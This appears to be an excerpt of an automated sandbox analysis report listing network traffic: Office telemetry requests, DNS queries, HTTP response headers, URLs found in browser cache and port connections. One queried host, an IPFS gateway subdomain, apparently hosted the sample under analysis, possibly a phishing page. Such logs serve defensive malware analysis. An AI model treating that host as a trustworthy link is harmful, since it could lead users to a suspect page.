        Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: chromecache_119.2.dr, chromecache_120.2.drString found in binary or memory: return b}lD.F="internal.enableAutoEventOnTimer";var Yb=ka(["data-gtm-yt-inspected-"]),nD=["www.youtube.com","www.youtube-nocookie.com"],oD,pD=!1; equals www.youtube.com (Youtube)
        Source: global trafficDNS traffic detected: DNS query: bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link
        Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
        Source: global trafficDNS traffic detected: DNS query: d12y7sg0iam4lc.cloudfront.net
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: image.thum.io
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 19:49:40 GMTContent-Type: text/plain; charset=utf-8Content-Length: 188Connection: closeaccess-control-allow-headers: Content-Typeaccess-control-allow-headers: Rangeaccess-control-allow-headers: User-Agentaccess-control-allow-headers: X-Requested-Withaccess-control-allow-methods: GETaccess-control-allow-methods: HEADaccess-control-allow-methods: OPTIONSaccess-control-allow-origin: *access-control-expose-headers: Content-Lengthaccess-control-expose-headers: Content-Rangeaccess-control-expose-headers: X-Chunked-Outputaccess-control-expose-headers: X-Ipfs-Pathaccess-control-expose-headers: X-Ipfs-Rootsaccess-control-expose-headers: X-Stream-Outputx-content-type-options: nosniffx-ipfs-path: /ipfs/bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma/img/bg-image.jpgx-ipfs-pop: rainbow-sv15-01CF-Cache-Status: HITSet-Cookie: __cflb=02DiuGkv5ni2nQgA5peJLD7iSo9uMP49CoXBowdQwHEJQ; SameSite=None; Secure; path=/; expires=Fri, 01-Nov-24 18:49:40 GMT; HttpOnlyServer: cloudflareCF-RAY: 8db62b7248eb0bd8-DFWalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: application/xmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 31 Oct 2024 19:49:41 GMTServer: AmazonS3X-Cache: Error from cloudfrontVia: 1.1 b6cf988ed9428ad8492255f2faaacfdc.cloudfront.net (CloudFront)X-Amz-Cf-Pop: AMS1-P1Alt-Svc: h3=":443"; ma=86400X-Amz-Cf-Id: cNChwpSGjwC2I1tVgSLqPuPIq9icv2yIM-9vaumUWSMskAgVMNiLPQ==Vary: Origin
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: application/xmlTransfer-Encoding: chunkedConnection: closeServer: AmazonS3Date: Thu, 31 Oct 2024 19:49:42 GMTX-Cache: Error from cloudfrontVia: 1.1 ef674a9df28e4fc8d944ae07304fa954.cloudfront.net (CloudFront)X-Amz-Cf-Pop: AMS1-P1Alt-Svc: h3=":443"; ma=86400X-Amz-Cf-Id: SqVxpu2Z5kHuwd6G3mvYn9pz_aEZDKzXCEVDQho9BKStpuhk_g9cvg==Vary: Origin
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: application/xmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 31 Oct 2024 19:49:42 GMTServer: AmazonS3X-Cache: Error from cloudfrontVia: 1.1 5e1e1cde81deec56515dcc5317501fe8.cloudfront.net (CloudFront)X-Amz-Cf-Pop: AMS1-P1Alt-Svc: h3=":443"; ma=86400X-Amz-Cf-Id: sztUECirfmaaYxFRzzltXGqMgwaYN-ISrWWmODIUUYxrqmuwRtiVTQ==Vary: Origin
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCross-Origin-Resource-Policy: cross-originContent-Type: text/html; charset=UTF-8X-Content-Type-Options: nosniffDate: Thu, 31 Oct 2024 19:49:48 GMTServer: sffeContent-Length: 1580X-XSS-Protection: 0Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
        Source: chromecache_126.2.dr, chromecache_121.2.drString found in binary or memory: https://appleid.cdn-apple.com/appleauth/static/jsapi/appleid/1/acknowledgements.txt
        Source: chromecache_119.2.dr, chromecache_120.2.drString found in binary or memory: https://cct.google/taggy/agent.js
        Source: chromecache_117.2.drString found in binary or memory: https://getbootstrap.com/)
        Source: chromecache_117.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
        Source: chromecache_119.2.dr, chromecache_120.2.drString found in binary or memory: https://pagead2.googlesyndication.com
        Source: chromecache_119.2.dr, chromecache_120.2.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
        Source: chromecache_119.2.dr, chromecache_120.2.drString found in binary or memory: https://td.doubleclick.net
        Source: chromecache_119.2.dr, chromecache_120.2.drString found in binary or memory: https://www.google-analytics.com/analytics.js
        Source: chromecache_119.2.dr, chromecache_120.2.drString found in binary or memory: https://www.google.com
        Source: chromecache_119.2.dr, chromecache_120.2.drString found in binary or memory: https://www.googleadservices.com
        Source: chromecache_120.2.drString found in binary or memory: https://www.googletagmanager.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52354
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52355
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52352
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52353
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52358
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52359
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52356
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52357
        Source: unknownNetwork traffic detected: HTTP traffic on port 52364 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52361
        Source: unknownNetwork traffic detected: HTTP traffic on port 52421 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52362
        Source: unknownNetwork traffic detected: HTTP traffic on port 52387 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52360
        Source: unknownNetwork traffic detected: HTTP traffic on port 52358 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 52444 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 52335 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52352 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52461 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52375 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52409 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52415 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52432 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52365
        Source: unknownNetwork traffic detected: HTTP traffic on port 52323 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52366
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52363
        Source: unknownNetwork traffic detected: HTTP traffic on port 52369 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52364
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52369
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52367
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52368
        Source: unknownNetwork traffic detected: HTTP traffic on port 52341 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52450 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52426 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52372
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52373
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52370
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52371
        Source: unknownNetwork traffic detected: HTTP traffic on port 52393 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52328 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52353 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52330 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52376 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52433 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52410 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52376
